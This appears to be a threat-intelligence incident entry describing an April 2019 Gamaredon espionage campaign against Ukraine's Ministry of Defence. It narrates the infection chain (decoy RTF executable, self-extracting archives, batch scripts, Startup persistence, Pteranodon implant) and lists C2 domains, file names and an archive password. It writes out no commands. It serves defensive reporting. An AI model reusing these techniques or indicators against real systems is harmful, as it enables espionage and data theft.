Cyber Incident Victim: Ministry of Defence of Ukraine
Date:
Apr 2019
Location:
Ukraine
Summary
A cyber espionage campaign targeted Ukrainian military personnel using a malicious executable disguised as a legitimate RTF document containing armed forces information. The attack, attributed to the Russian Gamaredon APT group, deployed a multi-stage infection chain involving self-extracting archives and batch scripts to establish persistence via startup entries. The final payload, a variant of the long-standing Pteranodon implant, harvested system information and exfiltrated it to command-and-control servers while periodically retrieving additional malicious tools like modified wget utilities. The infrastructure remained active with consistent operational patterns, reflecting the group's continued focus on Eastern European targets through established malware frameworks.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 3 motives | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
In April 2019, cybersecurity researchers identified a campaign targeting Ukrainian military personnel through a malicious executable masquerading as a legitimate RTF document titled "State of the Armed Forces of Ukraine," dated April 2, 2019. The attack leveraged a self-extracting archive (SFX) file falsely associated with Oracle software, though it carried an invalid digital signature and an expiration date set to March 16, 2019. Upon execution, the SFX deployed four files, including a batch script that initiated the infection sequence. The script first scanned for active security analysis tools like Wireshark and Process Explorer using tasklist.exe. It then renamed an embedded file to "Document.docx" to display a decoy document while extracting a password-protected archive ("26710") using the hard-coded password "dcthfdyjdfcdst,tv." This archive placed "winsetup.exe" in the user’s profile directory and established persistence via a LNK symlink in the Windows Startup folder. The second-stage SFX contained "MicrosoftCreate.exe," a UPX-packed version of the wget utility for Windows, and "30347.cmd," a script orchestrating the Pteranodon implant’s malicious activities.
The Pteranodon implant executed systeminfo.exe to gather host data, storing results in "fnQWAZC" and exfiltrating them to the command-and-control (C2) server "librework.ddns.net" using wget. The malware scheduled two recurring tasks: one downloaded "setup.exe" from "bitwork.ddns.net," while another placed "ie_cash.exe" (another wget instance) in "%APPDATA%\Roaming\Microsoft\IE\." A secondary task ran every 32 minutes to execute downloaded payloads. Analysis confirmed the infrastructure remained active in early April 2019, with multiple samples connecting to the same C2. The campaign exhibited code patterns consistent with Gamaredon APT group’s historical tactics, particularly the Pteranodon implant, which the group had maintained since 2013. Ukrainian CERT (CERT-UA) corroborated the group’s focus on Eastern European targets, aligning with broader Russian state-sponsored activities against Ukrainian entities during this period. The incident highlighted sustained cyber espionage efforts against Ukrainian defense infrastructure, though specific operational impacts or containment measures were not disclosed in available sources.